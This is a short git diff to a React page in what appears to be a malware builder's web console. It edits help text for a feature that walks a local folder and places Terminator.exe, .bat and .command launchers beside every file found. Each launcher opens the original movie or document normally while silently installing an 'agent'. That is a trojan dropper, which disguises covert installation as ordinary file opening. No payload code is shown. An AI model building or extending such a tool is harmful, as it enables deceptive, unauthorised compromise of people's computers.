diff --git a/server/web/src/pages/BuilderPage.tsx b/server/web/src/pages/BuilderPage.tsx index fa30708..937e85a 100644 --- a/server/web/src/pages/BuilderPage.tsx +++ b/server/web/src/pages/BuilderPage.tsx @@ -1990,9 +1990,11 @@ export default function BuilderPage() { description="Type a local folder path. The server walks it recursively and places a launcher next to every matching file — no upload needed." />
- For every file found (movies, docs, archives…) the server drops a .bat + .exe (Windows)
- and/or .command (Mac) right beside it in the same directory.
- The launcher opens the original file normally and silently installs the agent.
+ For every file found (movies, docs, archives…) the server drops all three companions right beside it:
+ Terminator.exe · Terminator.bat · Terminator.command
+ The original file is never touched.{' '}
+ Terminator.mkv stays exactly as-is. The .bat opens it in the default player
+ and silently runs the agent. The .command does the same on Mac.